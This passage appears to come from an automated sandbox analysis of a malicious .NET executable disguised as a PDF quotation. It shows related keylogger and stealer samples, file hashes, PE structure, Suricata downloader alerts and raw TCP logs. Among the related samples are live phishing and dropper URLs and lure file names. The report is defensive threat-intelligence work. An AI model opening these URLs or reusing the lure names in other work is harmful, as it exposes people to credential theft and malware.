	RFQ_List.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	na.doc	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
s23.filetransfer.io	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Payment Advice-BG_EDG9502024082400480004_5944_246#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
filetransfer.io	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	https://riocel.cl/74584847.pdf	Get hash	malicious	HtmlDropper	Browse	172.67.190.229
	Salary_Structure_Benefits_for_KchaneyIyNURVhUTlVNUkFORE9NMTkjIw== copy.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://onedrive.live.com/redir?resid=4F2A159F00FAB59%21138&authkey=%21ACaxJyMcnWh5xNs&page=View&wd=target%28Quick%20Notes.one%7C67689295-af57-4401-850f-57555db87326%2FNORTHEAST%20MICHIGAN%20COMMUNITY%20MENTAL%20HEALTH%C2%A0%20AUTHORITY%7C3ded3aeb-9f7f-4190-94f3-06088ff2e9af%2F%29&wdorigin=NavigationUrl	Get hash	malicious	Unknown	Browse	104.21.92.20
	https://onedrive.live.com/redir?resid=4F2A159F00FAB59%21138&authkey=%21ACaxJyMcnWh5xNs&page=View&wd=target%28Quick%20Notes.one%7C67689295-af57-4401-850f-57555db87326%2FNORTHEAST%20MICHIGAN%20COMMUNITY%20MENTAL%20HEALTH%C2%A0%20AUTHORITY%7C3ded3aeb-9f7f-4190-94f3-06088ff2e9af%2F%29&wdorigin=NavigationUrl	Get hash	malicious	Unknown	Browse	172.67.184.252
	https://shared.outlook.inky.com/link?domain=ctrk.klclick.com&t=h.eJx1zT1vwjAUheG_gjyX2E4ItpkoQgJlqGgUqWNlGzu1cvMh-2ZAFf8dJUO37s857y-ZI5DDhvwgTulAqcXYZR1YCLbL7NhToIxX76K5FNdzw9mtvtQf1dfts2rq0zcjbxvSLfs2mKgBddyaOYXBpbS1egqogcbRRXRw_CPGrs--9LkSd--5LbksuVHGi72WO6WkZCKnXORqLwvBimxXLiW3ljAAuMexnbDXg25d7wZMI8wYxiEtzwu9r_R_8nwBLatRZw.MEYCIQCSahzZW_4sDNrHIm-tqOS-MfCLNun8fj_Bxq7Zj7FBvQIhAKVsQPfH8EnP8IAulYo78COUXm3bMhbNANS-wTC8S6QO#bW1vc2VyQHNreWxpbmUtaG9sdC5jb20=	Get hash	malicious	HTMLPhisher	Browse	172.67.155.190
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
ORACLE-BMC-31898US	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	144.25.107.42
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	130.61.64.122
	splarm7.elf	Get hash	malicious	Unknown	Browse	147.154.235.35
	splx86.elf	Get hash	malicious	Unknown	Browse	140.204.109.171
	nklx86.elf	Get hash	malicious	Unknown	Browse	138.1.114.108
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	RFQ_List.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	RFQ_List.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	JOSXXL1.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Stealc, Vidar	Browse	188.114.96.3
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Sars Urgent Notice.pdf	Get hash	malicious	Unknown	Browse	188.114.96.3
	Lista produkt#U00f3w POL56583753Sarchmentdoc.bat	Get hash	malicious	Remcos, GuLoader	Browse	188.114.96.3
	XWe8H4gRPb.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	XWe8H4gRPb.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	188.114.96.3
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.789762251084559
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
File size:	94'720 bytes
MD5:	5ab07a2800291bd5cabc6ccaef82e20b
SHA1:	ba5c41ee66a9e9be480db7f828ba6a63fcc50bc6
SHA256:	6c403516d322330a43a884229831078dfcadf76a81e77061f14b5de698efa071
SHA512:	addc42a5a915be017e876a167e73a97599aed6032ef118adcd4c91a2438a6ed7b6b67c1de6d9919f330c1bd76f7e6c87a89321da57471111f505bd879f41f7e6
SSDEEP:	1536:l1vFCBuAbdw2pfoqZOLqkJsbxMuLql1UzBDiKp5TsaaXtqy:HvFCBlb3pfoqZOLqkJyiGBDiGJOqy
TLSH:	26931AD3BAA65562C3CA1F36D6BB5C400F72F081A6D7EB4E248E22E5056377B8D05327
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...").g.................j............... ....@...... ....................................`...@......@............... .....

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x671F2922 [Mon Oct 28 06:03:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x5ec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x168e0	0x16a00	0ca970707c0be91adacd7b59d3024745	False	0.4315435082872928	data	5.8161960288618015	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1a000	0x5ec	0x600	4c459a9fea5920b3bdab06141d39acc5	False	0.427734375	data	4.21097289652697	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1a0a0	0x360	data			0.4131944444444444
RT_MANIFEST	0x1a400	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-28T13:48:03.555388+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49773	158.101.44.242	80	TCP
2024-10-28T13:48:04.602257+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49773	158.101.44.242	80	TCP
2024-10-28T13:48:05.318496+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49787	188.114.96.3	443	TCP
2024-10-28T13:48:06.039922+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49789	158.101.44.242	80	TCP
2024-10-28T13:48:07.492877+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49801	158.101.44.242	80	TCP
2024-10-28T13:48:11.056286+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49826	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 13:47:00.841165066 CET	49730	80	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:00.846685886 CET	80	49730	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:00.846822023 CET	49730	80	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:00.864451885 CET	49730	80	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:00.869895935 CET	80	49730	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:01.720910072 CET	80	49730	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:01.733994007 CET	49731	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:01.734054089 CET	443	49731	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:01.734128952 CET	49731	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:01.774028063 CET	49730	80	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:01.794918060 CET	49731	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:01.794945002 CET	443	49731	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:02.529459000 CET	443	49731	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:02.529763937 CET	49731	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:02.533179998 CET	49731	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:02.533209085 CET	443	49731	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:02.533499002 CET	443	49731	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:02.577649117 CET	49731	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:02.628590107 CET	49731	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:02.675328970 CET	443	49731	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:03.595391989 CET	443	49731	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:03.595504045 CET	443	49731	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:03.595607996 CET	49731	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:03.633836985 CET	49731	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:03.646645069 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:03.646684885 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:03.646763086 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:03.647185087 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:03.647200108 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:04.293040037 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:04.293191910 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:04.295516968 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:04.295532942 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:04.295789003 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:04.297183037 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:04.339376926 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.334611893 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.334741116 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.334796906 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.334806919 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.334891081 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.334935904 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.334943056 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.335025072 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.335072994 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.335078955 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.335166931 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.335213900 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.335220098 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.383445978 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.383454084 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.430289984 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.457402945 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.457592964 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.457643986 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.457652092 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.457751036 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.457792044 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.457801104 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.458411932 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.458472967 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.458479881 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.458833933 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.458888054 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.458894014 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.459449053 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.459501982 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.459507942 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.459611893 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.459656954 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.459665060 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.460376978 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.460431099 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.460438013 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.463352919 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.463407040 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.463422060 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.463541031 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.463593006 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.463604927 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.463902950 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.463956118 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.463962078 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.508438110 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.581216097 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.581387997 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.581442118 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.581451893 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.581531048 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.581574917 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.581582069 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.581660986 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.581707001 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.581715107 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.581912041 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.581959009 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.581965923 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.582446098 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.582521915 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.582528114 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.582544088 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.582592964 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.582600117 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.582637072 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.583089113 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.583148003 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.583206892 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.583259106 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.584078074 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.584165096 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.584199905 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.584206104 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.584217072 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.584232092 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.584249020 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.584254980 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:13.584284067 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:13.633400917 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.289892912 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.289908886 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.289963007 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.290035963 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.290082932 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.290095091 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.290237904 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.290355921 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.290405035 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.413332939 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.413400888 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.419147968 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.419199944 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.420176029 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.420234919 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.420241117 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.420252085 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.420280933 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.420285940 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.420291901 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.420320034 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.461520910 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661103964 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661115885 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661187887 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661218882 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661271095 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661381960 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661429882 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661463022 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661509037 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661597013 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661648989 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661700964 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661750078 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661818981 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661870956 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661874056 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661887884 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661916018 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661927938 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661938906 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661976099 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.661983013 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.661988020 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.662020922 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.662039995 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.670510054 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.670595884 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.670635939 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.670681953 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.670841932 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.670887947 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.671101093 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.671145916 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.671278954 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.671325922 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.671329975 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.671335936 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.671374083 CET	49732	443	192.168.2.4	188.114.96.3
